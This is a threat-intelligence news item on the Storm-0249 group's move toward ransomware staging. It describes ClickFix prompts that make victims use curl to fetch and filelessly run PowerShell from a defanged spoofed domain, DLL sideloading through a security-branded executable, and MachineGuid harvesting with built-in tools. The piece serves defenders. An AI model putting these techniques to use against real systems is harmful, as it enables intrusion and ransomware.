Storm-0249 pivots to stealthy ransomware tradecraft

Storm-0249 pivots to stealthy ransomware tradecraft
December 9, 2025 at 12:00 AM

Storm-0249 is moving beyond its initial-access-broker roots and refining a stealthy toolkit to enable ransomware operations. Recent analysis from ReliaQuest highlights a pivot to domain spoofing, fileless PowerShell, DLL sideloading, and living-off-the-land techniques to quietly infiltrate networks, persist, and evade detection.

Microsoft previously tied Storm-0249 to tax-themed phishing that delivered Latrodectus and the Brute Ratel C4 (BRc4) framework. The actor monetizes footholds by selling access to ransomware and extortion crews, accelerating intrusions across enterprise environments.

Key tactics observed:

  • ClickFix social engineering prompts victims to run commands via the Windows Run dialog under the guise of fixing an issue.
  • The command abuses legitimate "curl.exe" to retrieve a PowerShell script from a fake Microsoft-like URL ("sgcipl[.]com/us.microsoft.com/bdo/") and executes it filelessly.
  • A malicious MSI runs with SYSTEM privileges, dropping a trojanized "SentinelAgentCore.dll" alongside the legitimate "SentinelAgentWorker.exe" in the user’s AppData folder.
  • DLL sideloading ensures the rogue DLL loads when "SentinelAgentWorker.exe" starts, establishing encrypted C2 communications and blending into trusted, signed processes.
  • Built-in Windows tools like "reg.exe" and "findstr.exe" harvest unique system identifiers such as MachineGuid, laying groundwork for follow-on ransomware activity.

Why this matters:

  • The campaign shifts from mass phishing to precision operations that weaponize trust in signed and security-branded processes, reducing traditional detection signals.
  • ReliaQuest assesses this is preparation for ransomware affiliates. Groups such as LockBit and ALPHV bind encryption keys to MachineGuid, making decryption impossible without attacker-held keys—even if defenders capture the binary.

Bottom line: Storm-0249 is sharpening its tradecraft to quietly stage ransomware intrusions through trusted processes, fileless execution, and DLL sideloading—making early detection and validation of "trusted" binaries and network egress even more critical.

Source: The Hacker News

Back…